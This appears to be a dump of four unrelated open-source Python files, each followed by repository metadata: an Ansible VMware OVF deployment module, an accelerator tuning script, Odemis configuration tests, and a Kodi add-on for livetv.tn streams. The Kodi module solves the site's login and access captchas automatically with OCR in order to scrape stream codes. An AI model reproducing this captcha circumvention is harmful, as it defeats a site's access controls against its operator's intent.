- ' folder: datacenter1/vm'
- ' folder: /datacenter1/vm/folder1'
- ' folder: datacenter1/vm/folder1'
- ' folder: /folder1/datacenter1/vm'
- ' folder: folder1/datacenter1/vm'
- ' folder: /folder1/datacenter1/vm/folder2'
type: str
inject_ovf_env:
description:
- Force the given properties to be inserted into an OVF Environment and injected through VMware Tools.
version_added: "2.8"
type: bool
name:
description:
- Name of the VM to work with.
- Virtual machine names in vCenter are not necessarily unique, which may be problematic.
type: str
networks:
default:
VM Network: VM Network
description:
- 'C(key: value) mapping of OVF network name, to the vCenter network name.'
type: dict
ovf:
description:
- 'Path to OVF or OVA file to deploy.'
aliases:
- ova
power_on:
default: true
description:
- 'Whether or not to power on the virtual machine after creation.'
type: bool
properties:
description:
- The assignment of values to the properties found in the OVF as key value pairs.
type: dict
resource_pool:
default: Resources
description:
- Resource Pool to deploy to.
type: str
wait:
default: true
description:
- 'Wait for the host to power on.'
type: bool
wait_for_ip_address:
default: false
description:
- Wait until vCenter detects an IP address for the VM.
- This requires vmware-tools (vmtoolsd) to properly work after creation.
type: bool
requirements:
- pyvmomi
version_added: "2.7"
extends_documentation_fragment: vmware.documentation
'''
EXAMPLES = r'''
- vmware_deploy_ovf:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
ovf: /path/to/ubuntu-16.04-amd64.ovf
wait_for_ip_address: true
delegate_to: localhost
# Deploys a new VM named 'NewVM' in specific datacenter/cluster, with network mapping taken from variable and using ova template from an absolute path
- vmware_deploy_ovf:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
datacenter: Datacenter1
cluster: Cluster1
datastore: vsandatastore
name: NewVM
networks: "{u'VM Network':u'{{ ProvisioningNetworkLabel }}'}"
validate_certs: no
power_on: no
ovf: /absolute/path/to/template/mytemplate.ova
delegate_to: localhost
'''
RETURN = r'''
instance:
description: metadata about the new virtual machine
returned: always
type: dict
sample: None
'''
import io
import os
import sys
import tarfile
import time
import traceback
import xml.etree.ElementTree as ET
from threading import Thread
from ansible.module_utils._text import to_native
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six import string_types
from ansible.module_utils.urls import generic_urlparse, open_url, urlparse, urlunparse
from ansible.module_utils.vmware import (find_network_by_name, find_vm_by_name, PyVmomi,
gather_vm_facts, vmware_argument_spec, wait_for_task, wait_for_vm_ip)
try:
from ansible.module_utils.vmware import vim
from pyVmomi import vmodl
except ImportError:
pass
def path_exists(value):
if not isinstance(value, string_types):
value = str(value)
value = os.path.expanduser(os.path.expandvars(value))
if not os.path.exists(value):
raise ValueError('%s is not a valid path' % value)
return value
class ProgressReader(io.FileIO):
def __init__(self, name, mode='r', closefd=True):
self.bytes_read = 0
io.FileIO.__init__(self, name, mode=mode, closefd=closefd)
def read(self, size=10240):
chunk = io.FileIO.read(self, size)
self.bytes_read += len(chunk)
return chunk
class TarFileProgressReader(tarfile.ExFileObject):
def __init__(self, *args):
self.bytes_read = 0
tarfile.ExFileObject.__init__(self, *args)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
try:
self.close()
except Exception:
pass
def read(self, size=10240):
chunk = tarfile.ExFileObject.read(self, size)
self.bytes_read += len(chunk)
return chunk
class VMDKUploader(Thread):
def __init__(self, vmdk, url, validate_certs=True, tarinfo=None, create=False):
Thread.__init__(self)
self.vmdk = vmdk
if tarinfo:
self.size = tarinfo.size
else:
self.size = os.stat(vmdk).st_size
self.url = url
self.validate_certs = validate_certs
self.tarinfo = tarinfo
self.f = None
self.e = None
self._create = create
@property
def bytes_read(self):
try:
return self.f.bytes_read
except AttributeError:
return 0
def _request_opts(self):
'''
Requests for vmdk files differ from other file types. Build the request options here to handle that
'''
headers = {
'Content-Length': self.size,
'Content-Type': 'application/octet-stream',
}
if self._create:
# Non-VMDK
method = 'PUT'
headers['Overwrite'] = 't'
else:
# VMDK
method = 'POST'
headers['Content-Type'] = 'application/x-vnd.vmware-streamVmdk'
return {
'method': method,
'headers': headers,
}
def _open_url(self):
open_url(self.url, data=self.f, validate_certs=self.validate_certs, **self._request_opts())
def run(self):
if self.tarinfo:
try:
with TarFileProgressReader(self.vmdk, self.tarinfo) as self.f:
self._open_url()
except Exception:
self.e = sys.exc_info()
else:
try:
with ProgressReader(self.vmdk, 'rb') as self.f:
self._open_url()
except Exception:
self.e = sys.exc_info()
class VMwareDeployOvf(PyVmomi):
def __init__(self, module):
super(VMwareDeployOvf, self).__init__(module)
self.module = module
self.params = module.params
self.datastore = None
self.datacenter = None
self.resource_pool = None
self.network_mappings = []
self.ovf_descriptor = None
self.tar = None
self.lease = None
self.import_spec = None
self.entity = None
def get_objects(self):
self.datacenter = self.find_datacenter_by_name(self.params['datacenter'])
if not self.datacenter:
self.module.fail_json(msg='%(datacenter)s could not be located' % self.params)
self.datastore = None
datastore_cluster_obj = self.find_datastore_cluster_by_name(self.params['datastore'])
if datastore_cluster_obj:
datastore = None
datastore_freespace = 0
for ds in datastore_cluster_obj.childEntity:
if isinstance(ds, vim.Datastore) and ds.summary.freeSpace > datastore_freespace:
# If datastore field is provided, filter destination datastores
if ds.summary.maintenanceMode != 'normal' or not ds.summary.accessible:
continue
datastore = ds
datastore_freespace = ds.summary.freeSpace
if datastore:
self.datastore = datastore
else:
self.datastore = self.find_datastore_by_name(self.params['datastore'], self.datacenter)
if not self.datastore:
self.module.fail_json(msg='%(datastore)s could not be located' % self.params)
if self.params['cluster']:
resource_pools = []
cluster = self.find_cluster_by_name(self.params['cluster'], datacenter_name=self.datacenter)
if cluster is None:
self.module.fail_json(msg="Unable to find cluster '%(cluster)s'" % self.params)
self.resource_pool = self.find_resource_pool_by_cluster(self.params['resource_pool'], cluster=cluster)
else:
self.resource_pool = self.find_resource_pool_by_name(self.params['resource_pool'])
if not self.resource_pool:
self.module.fail_json(msg='%(resource_pool)s could not be located' % self.params)
for key, value in self.params['networks'].items():
network = find_network_by_name(self.content, value)
if not network:
self.module.fail_json(msg='%(network)s could not be located' % self.params)
network_mapping = vim.OvfManager.NetworkMapping()
network_mapping.name = key
network_mapping.network = network
self.network_mappings.append(network_mapping)
return self.datastore, self.datacenter, self.resource_pool, self.network_mappings
def get_ovf_descriptor(self):
if tarfile.is_tarfile(self.params['ovf']):
self.tar = tarfile.open(self.params['ovf'])
ovf = None
for candidate in self.tar.getmembers():
dummy, ext = os.path.splitext(candidate.name)
if ext.lower() == '.ovf':
ovf = candidate
break
if not ovf:
self.module.fail_json(msg='Could not locate OVF file in %(ovf)s' % self.params)
self.ovf_descriptor = to_native(self.tar.extractfile(ovf).read())
else:
with open(self.params['ovf']) as f:
self.ovf_descriptor = f.read()
return self.ovf_descriptor
def get_lease(self):
datastore, datacenter, resource_pool, network_mappings = self.get_objects()
params = {
'diskProvisioning': self.params['disk_provisioning'],
}
if self.params['name']:
params['entityName'] = self.params['name']
if network_mappings:
params['networkMapping'] = network_mappings
if self.params['deployment_option']:
params['deploymentOption'] = self.params['deployment_option']
if self.params['properties']:
params['propertyMapping'] = []
for key, value in self.params['properties'].items():
property_mapping = vim.KeyValue()
property_mapping.key = key
property_mapping.value = str(value) if isinstance(value, bool) else value
params['propertyMapping'].append(property_mapping)
if self.params['folder']:
folder = self.content.searchIndex.FindByInventoryPath(self.params['folder'])
if not folder:
self.module.fail_json(msg="Unable to find the specified folder %(folder)s" % self.params)
else:
folder = datacenter.vmFolder
spec_params = vim.OvfManager.CreateImportSpecParams(**params)
ovf_descriptor = self.get_ovf_descriptor()
self.import_spec = self.content.ovfManager.CreateImportSpec(
ovf_descriptor,
resource_pool,
datastore,
spec_params
)
errors = [to_native(e.msg) for e in getattr(self.import_spec, 'error', [])]
if self.params['fail_on_spec_warnings']:
errors.extend(
(to_native(w.msg) for w in getattr(self.import_spec, 'warning', []))
)
if errors:
self.module.fail_json(
msg='Failure validating OVF import spec: %s' % '. '.join(errors)
)
for warning in getattr(self.import_spec, 'warning', []):
self.module.warn('Problem validating OVF import spec: %s' % to_native(warning.msg))
if not self.params['allow_duplicates']:
name = self.import_spec.importSpec.configSpec.name
match = find_vm_by_name(self.content, name, folder=folder)
if match:
self.module.exit_json(instance=gather_vm_facts(self.content, match), changed=False)
if self.module.check_mode:
self.module.exit_json(changed=True, instance={'hw_name': name})
try:
self.lease = resource_pool.ImportVApp(
self.import_spec.importSpec,
folder
)
except vmodl.fault.SystemError as e:
self.module.fail_json(
msg='Failed to start import: %s' % to_native(e.msg)
)
while self.lease.state != vim.HttpNfcLease.State.ready:
time.sleep(0.1)
self.entity = self.lease.info.entity
return self.lease, self.import_spec
def _normalize_url(self, url):
'''
The hostname in URLs from vmware may be ``*``; update it accordingly
'''
url_parts = generic_urlparse(urlparse(url))
if url_parts.hostname == '*':
if url_parts.port:
url_parts.netloc = '%s:%d' % (self.params['hostname'], url_parts.port)
else:
url_parts.netloc = self.params['hostname']
return urlunparse(url_parts.as_list())
def upload(self):
if self.params['ovf'] is None:
self.module.fail_json(msg="OVF path is required for upload operation.")
ovf_dir = os.path.dirname(self.params['ovf'])
lease, import_spec = self.get_lease()
uploaders = []
for file_item in import_spec.fileItem:
device_upload_url = None
for device_url in lease.info.deviceUrl:
if file_item.deviceId == device_url.importKey:
device_upload_url = self._normalize_url(device_url.url)
break
if not device_upload_url:
lease.HttpNfcLeaseAbort(
vmodl.fault.SystemError(reason='Failed to find deviceUrl for file %s' % file_item.path)
)
self.module.fail_json(
msg='Failed to find deviceUrl for file %s' % file_item.path
)
vmdk_tarinfo = None
if self.tar:
vmdk = self.tar
try:
vmdk_tarinfo = self.tar.getmember(file_item.path)
except KeyError:
lease.HttpNfcLeaseAbort(
vmodl.fault.SystemError(reason='Failed to find VMDK file %s in OVA' % file_item.path)
)
self.module.fail_json(
msg='Failed to find VMDK file %s in OVA' % file_item.path
)
else:
vmdk = os.path.join(ovf_dir, file_item.path)
try:
path_exists(vmdk)
except ValueError:
lease.HttpNfcLeaseAbort(
vmodl.fault.SystemError(reason='Failed to find VMDK file at %s' % vmdk)
)
self.module.fail_json(
msg='Failed to find VMDK file at %s' % vmdk
)
uploaders.append(
VMDKUploader(
vmdk,
device_upload_url,
self.params['validate_certs'],
tarinfo=vmdk_tarinfo,
create=file_item.create
)
)
total_size = sum(u.size for u in uploaders)
total_bytes_read = [0] * len(uploaders)
for i, uploader in enumerate(uploaders):
uploader.start()
while uploader.is_alive():
time.sleep(0.1)
total_bytes_read[i] = uploader.bytes_read
lease.HttpNfcLeaseProgress(int(100.0 * sum(total_bytes_read) / total_size))
if uploader.e:
lease.HttpNfcLeaseAbort(
vmodl.fault.SystemError(reason='%s' % to_native(uploader.e[1]))
)
self.module.fail_json(
msg='%s' % to_native(uploader.e[1]),
exception=''.join(traceback.format_tb(uploader.e[2]))
)
def complete(self):
self.lease.HttpNfcLeaseComplete()
def inject_ovf_env(self):
attrib = {
'xmlns': 'http://schemas.dmtf.org/ovf/environment/1',
'xmlns:xsi': 'http://www.w3.org/2001/XMLSchema-instance',
'xmlns:oe': 'http://schemas.dmtf.org/ovf/environment/1',
'xmlns:ve': 'http://www.vmware.com/schema/ovfenv',
'oe:id': '',
've:esxId': self.entity._moId
}
env = ET.Element('Environment', **attrib)
platform = ET.SubElement(env, 'PlatformSection')
ET.SubElement(platform, 'Kind').text = self.content.about.name
ET.SubElement(platform, 'Version').text = self.content.about.version
ET.SubElement(platform, 'Vendor').text = self.content.about.vendor
ET.SubElement(platform, 'Locale').text = 'US'
prop_section = ET.SubElement(env, 'PropertySection')
for key, value in self.params['properties'].items():
params = {
'oe:key': key,
'oe:value': str(value) if isinstance(value, bool) else value
}
ET.SubElement(prop_section, 'Property', **params)
opt = vim.option.OptionValue()
opt.key = 'guestinfo.ovfEnv'
opt.value = '<?xml version="1.0" encoding="UTF-8"?>' + to_native(ET.tostring(env))
config_spec = vim.vm.ConfigSpec()
config_spec.extraConfig = [opt]
task = self.entity.ReconfigVM_Task(config_spec)
wait_for_task(task)
def deploy(self):
facts = {}
if self.params['inject_ovf_env']:
self.inject_ovf_env()
if self.params['power_on']:
task = self.entity.PowerOn()
if self.params['wait']:
wait_for_task(task)
if self.params['wait_for_ip_address']:
_facts = wait_for_vm_ip(self.content, self.entity)
if not _facts:
self.module.fail_json(msg='Waiting for IP address timed out')
facts.update(_facts)
if not facts:
facts.update(gather_vm_facts(self.content, self.entity))
return facts
def main():
argument_spec = vmware_argument_spec()
argument_spec.update({
'name': {},
'datastore': {
'default': 'datastore1',
},
'datacenter': {
'default': 'ha-datacenter',
},
'cluster': {
'default': None,
},
'deployment_option': {
'default': None,
},
'folder': {
'default': None,
},
'inject_ovf_env': {
'default': False,
'type': 'bool',
},
'resource_pool': {
'default': 'Resources',
},
'networks': {
'default': {
'VM Network': 'VM Network',
},
'type': 'dict',
},
'ovf': {
'type': path_exists,
'aliases': ['ova'],
},
'disk_provisioning': {
'choices': [
'flat',
'eagerZeroedThick',
'monolithicSparse',
'twoGbMaxExtentSparse',
'twoGbMaxExtentFlat',
'thin',
'sparse',
'thick',
'seSparse',
'monolithicFlat'
],
'default': 'thin',
},
'power_on': {
'type': 'bool',
'default': True,
},
'properties': {
'type': 'dict',
},
'wait': {
'type': 'bool',
'default': True,
},
'wait_for_ip_address': {
'type': 'bool',
'default': False,
},
'allow_duplicates': {
'type': 'bool',
'default': True,
},
'fail_on_spec_warnings': {
'type': 'bool',
'default': False,
},
})
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
deploy_ovf = VMwareDeployOvf(module)
deploy_ovf.upload()
deploy_ovf.complete()
facts = deploy_ovf.deploy()
module.exit_json(instance=facts, changed=True)
if __name__ == '__main__':
main()
|
roadmapper/ansible
|
lib/ansible/modules/cloud/vmware/vmware_deploy_ovf.py
|
Python
|
gpl-3.0
| 22,956 | 0.002701 |
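The upload progress reporting above rests on a small reader wrapper that counts bytes as they are handed out (ProgressReader/TarFileProgressReader), so the NFC lease can be told how far along the transfer is. Here is the same idea isolated as a runnable sketch; the temporary file and chunk size are arbitrary.

import io
import tempfile

class CountingReader(io.FileIO):
    """FileIO that remembers how many bytes have been read so far."""
    def __init__(self, name, mode='r', closefd=True):
        self.bytes_read = 0
        io.FileIO.__init__(self, name, mode=mode, closefd=closefd)

    def read(self, size=10240):
        chunk = io.FileIO.read(self, size)
        self.bytes_read += len(chunk)
        return chunk

with tempfile.NamedTemporaryFile(delete=False) as tmp:
    tmp.write(b"x" * 30000)
    path = tmp.name

with CountingReader(path, 'rb') as reader:
    while reader.read():
        pass                       # an uploader would push each chunk here
    print(reader.bytes_read)       # 30000 -> basis for a percentage like HttpNfcLeaseProgress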
'''
main tuning script, LCLS
'''
import numpy as np
from ocelot.mint.mint import Optimizer, Action
from ocelot.mint.flash1_interface import FLASH1MachineInterface, FLASH1DeviceProperties, TestInterface
mi = FLASH1MachineInterface()
dp = FLASH1DeviceProperties()
#opt = Optimizer(mi, dp)
opt = Optimizer(TestInterface(), dp)
opt.debug = True
opt.logging = True
opt.log_file = 'test.log'
opt.timeout = 1.2
seq1 = [Action(func=opt.max_sase, args=[ ['H10SMATCH','H12SMATCH'], 'simplex'] ) ]
seq2 = [Action(func=opt.max_sase, args=[ ['V14SMATCH','V7SMATCH'], 'simplex' ] )]
seq3 = [Action(func=opt.max_sase, args=[ ['V14SMATCH','V7SMATCH','H10SMATCH','H12SMATCH'], 'simplex' ] )]
seq4 = [Action(func=opt.max_sase, args=[ ['Q13SMATCH','Q15SMATCH'], 'simplex' ] )]
seq5 = [Action(func=opt.max_sase, args=[ ['H3DBC3','V3DBC3'], 'simplex' ] )]
seq6 = [Action(func=opt.max_sase, args=[ ['H3DBC3','V3DBC3','H10ACC7','V10ACC7'], 'simplex' ] )]
seq7 = [Action(func=opt.max_sase, args=[ ['Q5UND1.3.5','Q5UND2.4'], 'simplex' ] )]
seq8 = [Action(func=opt.max_sase, args=[ ['H3UND1','H3UND3','H3UND4','H3UND5'], 'simplex' ] )]
seq9 = [Action(func=opt.max_sase, args=[ ['H8TCOL','V8TCOL'], 'simplex' ] )]
seq10 = [Action(func=opt.max_sase, args=[ ['H3DBC3'], 'simplex' ] )]
seq0 = [Action(func=opt.max_sase, args=[ ['H10SMATCH','H12SMATCH'], 'cg', {'maxiter':15}] ),
Action(func=opt.max_sase, args=[ ['H10SMATCH','H12SMATCH'], 'simplex', {'maxiter':25}] )]
opt.eval(seq1)
"""
#import json
def get_dict(lat, bpms):
dict_bpms = {}
for elem in lat.sequence:
if elem.type == "monitor" and elem.mi_id in bpms:
dict_bpms[elem.mi_id] = {}
dict_bpms[elem.mi_id]["x"] = elem.x
dict_bpms[elem.mi_id]["y"] = elem.y
return dict_bpms
#dp = FLASH1DeviceProperties()
def apply_bump(names, currents, dIs, alpha):
mi.set_value(names, currents+dIs*alpha)
cors = ['H3DBC3', 'H10ACC4','H9ACC5', 'H10ACC5', 'H9ACC6', 'H10ACC6', 'H10ACC7']
dI = np.array([-0.0114768844711, -0.183727960466, 0.325959042831, 0.318743893708, 0.15280311903, 0.130996600233, -0.831909116508])
currents = np.array([ -0.0229914523661, 0.0250000003725, 0.985000014305, 0.0, -1.17299997807, 0.0, 0.148000001907])
bump = {"correctors":cors, "dI": dI, "currents":currents}
alpha = 0.1
seq_bump = [Action(func=opt.max_sase_bump, args=[ bump, alpha, 'simplex' ] )]
orbit = {}
orbit["correctors"] = ['H3SFELC', 'H4SFELC', 'H10SMATCH', 'D11SMATCH', 'H12SMATCH']
setup = log.MachineSetup()
#setup.save_lattice(lat, "init.txt")
lat_all = MagneticLattice(lattice)
setup.load_lattice("init.txt", lat_all)
orbit["bpms"] = get_dict(lat, bpms)
seq_min_orb = [Action(func=opt.min_orbit, args=[orbit, 'simplex' ] )]
opt.eval(seq_bump)
apply_bump(cors, currents, dI, alpha=0.1)
"""
|
sserkez/ocelot
|
mint/flash_tune.py
|
Python
|
gpl-3.0
| 2,806 | 0.024947 |
# -*- coding: utf-8 -*-
"""
:created: 27 Aug 2014
:author: Éric Piel
:copyright: © 2014 Éric Piel, Delmic
This file is part of Odemis.
.. license::
Odemis is free software: you can redistribute it and/or modify it under the terms of the GNU
General Public License version 2 as published by the Free Software Foundation.
Odemis is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License along with Odemis. If not,
see http://www.gnu.org/licenses/.
"""
from __future__ import division
from past.builtins import basestring
import logging
import odemis.gui.conf.file as conffile
import odemis.gui as gui
from odemis.util import test
import os
import shutil
import unittest
from unittest.case import skip
logging.getLogger().setLevel(logging.DEBUG)
class ConfigTest(object):
""" Generic test setup/teardown methods for testing one configuration """
# .conf_class must be defined
def setUp(self):
# save the real user file to be able to do whatever we like
filename = os.path.join(conffile.CONF_PATH, self.conf_class.file_name)
backname = filename + u".testbak"
if os.path.exists(filename):
logging.info("Saving file %s", filename)
shutil.copy2(filename, backname)
self.backname = backname
else:
self.backname = None
self.filename = filename
def tearDown(self):
if self.backname:
logging.info("Restoring file %s", self.filename)
shutil.copy2(self.backname, self.filename)
else:
try:
os.remove(self.filename)
except OSError:
pass
else:
logging.info("Deleting test file %s", self.filename)
# Reset the module globals
gui.conf.CONF_GENERAL = None
gui.conf.CONF_ACQUI = None
gui.conf.CONF_CALIB = None
class GeneralConfigTest(ConfigTest, unittest.TestCase):
conf_class = gui.conf.file.GeneralConfig
def test_simple(self):
conf = gui.conf.get_general_conf()
path = conf.get_manual()
if path is not None:
self.assertTrue(os.path.exists(path))
path = conf.get_manual("secom")
if path is not None:
self.assertTrue(os.path.exists(path))
path = conf.get_dev_manual()
if path is not None:
self.assertTrue(os.path.exists(path))
def test_save(self):
conf = gui.conf.get_general_conf()
conf.set("calibration", "ar_file", u"booo")
# reset
del conf
gui.conf.CONF_GENERAL = None
conf = gui.conf.get_general_conf()
path = conf.get("calibration", "ar_file")
self.assertEqual(path, u"booo")
def test_save_unicode(self):
conf = gui.conf.get_general_conf()
conf.set("calibration", "ar_file", u"booµ")
# reset
del conf
gui.conf.CONF_GENERAL = None
conf = gui.conf.get_general_conf()
path = conf.get("calibration", "ar_file")
self.assertEqual(path, u"booµ")
def test_default(self):
try:
os.remove(self.filename)
except OSError:
pass
conf = gui.conf.get_general_conf()
path = conf.get("calibration", "ar_file")
self.assertEqual(path, u"")
path = conf.get("calibration", "spec_file")
self.assertEqual(path, u"")
path = conf.get_manual()
self.assertTrue(path.endswith(u".pdf"))
class AcquisitionConfigTest(ConfigTest, unittest.TestCase):
conf_class = gui.conf.file.AcquisitionConfig
def test_simple(self):
conf = gui.conf.get_acqui_conf()
self.assertIsInstance(conf.last_path, basestring)
self.assertIsInstance(conf.last_format, basestring)
self.assertLess(len(conf.last_extension), 12)
def test_save(self):
# Will fail if setting the properties goes wrong
conf = gui.conf.get_acqui_conf()
conf.last_path = u"/home/booo/"
conf.last_format = "HDF5"
conf.last_extension = ".h5"
conf.fn_ptn = u"{timelng}-test {cnt}"
def test_save_unicode(self):
conf = gui.conf.get_acqui_conf()
conf.last_path = u"/home/boooµ/"
conf.last_format = "HDF5"
conf.last_extension = ".h5"
conf.fn_ptn = u"{timelng}-test {cnt} µm value"
class CalibrationConfigTest(ConfigTest, unittest.TestCase):
conf_class = gui.conf.file.CalibrationConfig
def test_simple(self):
conf = gui.conf.get_calib_conf()
# non existing id should return None
calib = conf.get_sh_calib(0)
self.assertIs(calib, None)
def test_save(self):
conf = gui.conf.get_calib_conf()
shid = 125166841353
# try with a bit annoying numbers
htop = (-0.5, 1e-6)
hbot = (5e9, -1.55158e-6)
hfoc = 0.006
ofoc = -0.001e-6
strans = (5.468e-3, -365e-6)
sscale = (1.1, 0.9)
srot = 0.1
iscale = (13.1, 13.1)
irot = 5.9606
iscale_xy = (1.01, 0.9)
ishear = 1.1
resa = (8.09, 2.16)
resb = (-157.5, -202.9)
hfwa = (-0.953, -0.009)
scaleshift = (0.029, -2.90e-05)
orig_calib = (htop, hbot, hfoc, ofoc, strans, sscale, srot, iscale, irot,
iscale_xy, ishear, resa, resb, hfwa, scaleshift)
conf.set_sh_calib(shid, *orig_calib)
# read back from memory
back_calib = conf.get_sh_calib(shid)
for o, b in zip(orig_calib, back_calib):
if isinstance(o, tuple):
test.assert_tuple_almost_equal(o, b)
else:
self.assertAlmostEqual(o, b)
# read back from file
del conf
gui.conf.CONF_CALIB = None
conf = gui.conf.get_calib_conf()
back_calib = conf.get_sh_calib(shid)
for o, b in zip(orig_calib, back_calib):
if isinstance(o, tuple):
test.assert_tuple_almost_equal(o, b)
else:
self.assertAlmostEqual(o, b)
if __name__ == "__main__":
unittest.main()
|
delmic/odemis
|
src/odemis/gui/conf/test/conf_test.py
|
Python
|
gpl-2.0
| 6,386 | 0.001097 |
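The ConfigTest mixin above guards the user's real configuration file by copying it aside in setUp and putting it back (or deleting the test artefact) in tearDown. The same pattern reduced to a self-contained sketch; the path is a made-up placeholder, whereas odemis derives it from conffile.CONF_PATH and the conf class.

import os
import shutil
import unittest

class FileBackupTestCase(unittest.TestCase):
    # hypothetical path, for illustration only
    filename = os.path.expanduser("~/.config/example/app.conf")

    def setUp(self):
        self.backname = None
        if os.path.exists(self.filename):
            self.backname = self.filename + ".testbak"
            shutil.copy2(self.filename, self.backname)

    def tearDown(self):
        if self.backname:
            shutil.copy2(self.backname, self.filename)
            os.remove(self.backname)
        else:
            try:
                os.remove(self.filename)  # drop whatever the test created
            except OSError:
                pass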
# -*- coding: utf-8 -*-
import xbmc, xbmcgui, xbmcplugin
import urllib2,urllib,cgi, re
import HTMLParser
import xbmcaddon
import json
import traceback
import os
import cookielib
from BeautifulSoup import BeautifulStoneSoup, BeautifulSoup, BeautifulSOAP
import datetime
import sys
import time
import CustomPlayer
import captcha
__addon__ = xbmcaddon.Addon()
__addonname__ = __addon__.getAddonInfo('name')
__icon__ = __addon__.getAddonInfo('icon')
addon_id = 'plugin.video.shahidmbcnet'
selfAddon = xbmcaddon.Addon(id=addon_id)
addonPath = xbmcaddon.Addon().getAddonInfo("path")
addonArt = os.path.join(addonPath,'resources/images')
communityStreamPath = os.path.join(addonPath,'resources/community')
COOKIEFILE = communityStreamPath+'/livePlayerLoginCookie.lwp'
profile_path = xbmc.translatePath(selfAddon.getAddonInfo('profile'))
def PlayStream(sourceEtree, urlSoup, name, url):
try:
playpath=urlSoup.chnumber.text
pDialog = xbmcgui.DialogProgress()
pDialog.create('XBMC', 'Communicating with Livetv')
pDialog.update(40, 'Attempting to Login')
if shouldforceLogin():
if performLogin():
print 'done login'
print 'ooops'
code=getcode();
print 'firstCode',code
if 1==2 and not code or code[0:1]=="w":
pDialog.update(40, 'Refreshing Login')
code=getcode(True);
print 'secondCode',code
liveLink= sourceEtree.findtext('rtmpstring')
pDialog.update(80, 'Login Completed, now playing')
print 'rtmpstring',liveLink
#liveLink=liveLink%(playpath,match)
liveLink=liveLink%(playpath,code)
name+='-LiveTV'
print 'liveLink',liveLink
listitem = xbmcgui.ListItem( label = str(name), iconImage = "DefaultVideo.png", thumbnailImage = xbmc.getInfoImage( "ListItem.Thumb" ), path=liveLink )
pDialog.close()
player = CustomPlayer.MyXBMCPlayer()
start = time.time()
#xbmc.Player().play( liveLink,listitem)
player.play( liveLink,listitem)
while player.is_active:
xbmc.sleep(200)
#return player.urlplayed
#done = time.time()
done = time.time()
elapsed = done - start
if player.urlplayed and elapsed>=3:
return True
else:
return False
except:
traceback.print_exc(file=sys.stdout)
return False
def getcode():
#url = urlSoup.url.text
cookieJar=getCookieJar()
link=getUrl('http://www.livetv.tn/index.php',cookieJar)
captcha=None
match =re.findall('<img src=\"(.*?)\" alt=\"CAPT', link)
if len(match)>0:
captcha="http://www.livetv.tn"+match[0]
else:
captcha=None
solution=None
if captcha:
local_captcha = os.path.join(profile_path, "captchaC.img" )
localFile = open(local_captcha, "wb")
localFile.write(getUrl(captcha,cookieJar))
localFile.close()
cap=parseCaptcha(local_captcha)
print 'parsed cap',cap
if cap=="" or not len(cap)==3:
solver = InputWindow(captcha=local_captcha)
solution = solver.get()
else:
solution=cap
if solution:
#do captcha post
post={'capcode':solution}
post = urllib.urlencode(post)
link=getUrl("http://www.livetv.tn/",cookieJar,post)
code =re.findall('code=(.*?)[\'\"]', link)[0]
return code
def parseCaptcha(filePath):
retVal=""
try:
print 'the val is'
retVal=captcha.getString(filePath)
print 'the val is',retVal
except: traceback.print_exc(file=sys.stdout)
return retVal
def getUrl(url, cookieJar=None,post=None):
cookie_handler = urllib2.HTTPCookieProcessor(cookieJar)
opener = urllib2.build_opener(cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
#opener = urllib2.install_opener(opener)
req = urllib2.Request(url)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36')
response = opener.open(req,post)
link=response.read()
response.close()
return link;
def getCookieJar():
cookieJar=None
try:
cookieJar = cookielib.LWPCookieJar()
cookieJar.load(COOKIEFILE,ignore_discard=True)
except:
cookieJar=None
if not cookieJar:
cookieJar = cookielib.LWPCookieJar()
return cookieJar
def performLogin():
cookieJar=cookielib.LWPCookieJar()
html_text=getUrl("http://www.livetv.tn/login.php",cookieJar)
cookieJar.save (COOKIEFILE,ignore_discard=True)
print 'cookie jar saved',cookieJar
match =re.findall('<img src=\"(.*?)\" alt=\"Cap', html_text)
if len(match)>0:
captcha="http://www.livetv.tn/"+match[0]
else:
captcha=None
if captcha:
local_captcha = os.path.join(profile_path, "captcha.img" )
localFile = open(local_captcha, "wb")
localFile.write(getUrl(captcha,cookieJar))
localFile.close()
cap=parseCaptcha(local_captcha)
print 'login parsed cap',cap
if cap=="" or not len(cap)==4:
solver = InputWindow(captcha=local_captcha)
solution = solver.get()
else:
solution=cap
if solution or captcha==None:
print 'performing login'
userName=selfAddon.getSetting( "liveTvLogin" )
password=selfAddon.getSetting( "liveTvPassword")
if captcha:
post={'pseudo':userName,'epass':password,'capcode':solution}
else:
post={'pseudo':userName,'epass':password}
post = urllib.urlencode(post)
getUrl("http://www.livetv.tn/login.php",cookieJar,post)
return shouldforceLogin(cookieJar)==False
else:
return False
def shoudforceLogin2():
try:
# import datetime
lastUpdate=selfAddon.getSetting( "lastLivetvLogin" )
print 'lastUpdate',lastUpdate
do_login=False
now_datetime=datetime.datetime.now()
if lastUpdate==None or lastUpdate=="":
do_login=True
else:
print 'lastlogin',lastUpdate
try:
lastUpdate=datetime.datetime.strptime(lastUpdate,"%Y-%m-%d %H:%M:%S")
except TypeError:
lastUpdate = datetime.datetime.fromtimestamp(time.mktime(time.strptime(lastUpdate, "%Y-%m-%d %H:%M:%S")))
t=(now_datetime-lastUpdate).seconds/60
print 'lastUpdate',lastUpdate,now_datetime
print 't',t
if t>15:
do_login=True
print 'do_login',do_login
return do_login
except:
traceback.print_exc(file=sys.stdout)
return True
def shouldforceLogin(cookieJar=None):
try:
url="http://www.livetv.tn/index.php"
if not cookieJar:
cookieJar=getCookieJar()
html_txt=getUrl(url,cookieJar)
if '<a href="http://www.livetv.tn/login.php">' in html_txt:
return True
else:
return False
except:
traceback.print_exc(file=sys.stdout)
return True
class InputWindow(xbmcgui.WindowDialog):
def __init__(self, *args, **kwargs):
self.cptloc = kwargs.get('captcha')
self.img = xbmcgui.ControlImage(335,30,624,60,self.cptloc)
self.addControl(self.img)
self.kbd = xbmc.Keyboard()
def get(self):
self.show()
time.sleep(3)
self.kbd.doModal()
if (self.kbd.isConfirmed()):
text = self.kbd.getText()
self.close()
return text
self.close()
return False
|
